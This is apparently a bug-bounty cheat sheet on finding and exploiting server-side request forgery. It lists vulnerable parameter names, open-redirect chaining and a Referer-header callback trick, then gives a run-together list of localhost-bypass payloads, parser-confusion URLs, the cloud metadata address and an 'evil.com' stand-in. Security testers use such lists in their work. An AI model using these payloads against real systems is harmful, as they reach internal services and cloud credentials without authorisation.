SSRF
Exploit
Section titled “Exploit”Finding ssrf
Section titled “Finding ssrf”URL parameters
Section titled “URL parameters”url=targetUrl=requestUrl=path=API, webhooks
Section titled “API, webhooks”Look for developer portal, e.g. developer.example.com, example.com/developer
Open redirects
Section titled “Open redirects”Find open redirects and chain SSRF.
goreturnr_urlreturnUrlreturnUrilocationUrlgoToreturn_urlreturn_uriref=referrer=backUrlreturnTosuccessUrlReferer header
Section titled “Referer header”Simply set Referer: https://www.yourdomain.com and start logging requests via your own private collaborator server.
GET / HTTP/1.1Host: victim.comReferer: https://www.yourdomain.comPDF generators
Section titled “PDF generators”Hunting for SSRF Bugs in PDF Generator
Payload
Section titled “Payload”http://127.0.0.1:80http://0.0.0.0:80http://localhost:80http://[::]:80/http://spoofed.burpcollaborator.nethttp://localtest.mehttp://customer1.app.localhost.my.company.127.0.0.1.nip.iohttp://mail.ebc.apple.com redirect to 127.0.0.6 == localhosthttp://bugbounty.dod.network redirect to 127.0.0.2 == localhosthttp://127.127.127.127http://2130706433/ = http://127.0.0.1http://[0:0:0:0:0:ffff:127.0.0.1]localhost:+11211aaahttp://0/http://1.1.1.1 &@2.2.2.2# @3.3.3.3/http://127.1.1.1:80\@127.2.2.2:80/http://127.1.1.1:80\@@127.2.2.2:80/http://127.1.1.1:80:\@@127.2.2.2:80/http://127.1.1.1:80#\@127.2.2.2:80/http://169.254.169.2540://evil.com:80;http://google.com:80